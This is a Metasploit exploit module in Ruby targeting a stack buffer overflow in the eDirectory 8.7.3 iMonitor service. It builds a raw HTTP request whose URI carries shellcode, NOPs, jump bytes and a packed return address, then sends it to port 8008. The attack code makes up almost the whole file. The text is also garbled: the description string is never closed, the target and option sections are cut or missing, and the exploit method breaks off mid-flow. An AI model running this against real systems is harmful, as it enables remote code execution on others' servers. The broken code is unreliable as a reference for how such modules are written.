##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = GreatRanking
def initialize(info = {})
super(update_info(info,
'Name' => 'eDirectory 8.7.3 iMonitor Remote Stack Buffer Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in eDirectory 8.7.3
iMonitor service. This vulnerability was discovered by Peter
Winter-Smith of NGSSoftware.
register_options(
[
Opt::RPORT(8008)
], self.class)
end
def exploit
c = connect
# pop/pop/ret in ndsimon.dlm on our jump to our shellcode
uri = '/nds/' + payload.encoded + make_nops(2) + "\xeb\x04" + [target.ret].pack('V')
uri << "\xe9\xbd\xef\xff\xff"
uri << "B" * 0xD0
res = c.send_request(c.request_raw({ 'uri' => uri }))
select(nil,nil,nil,4)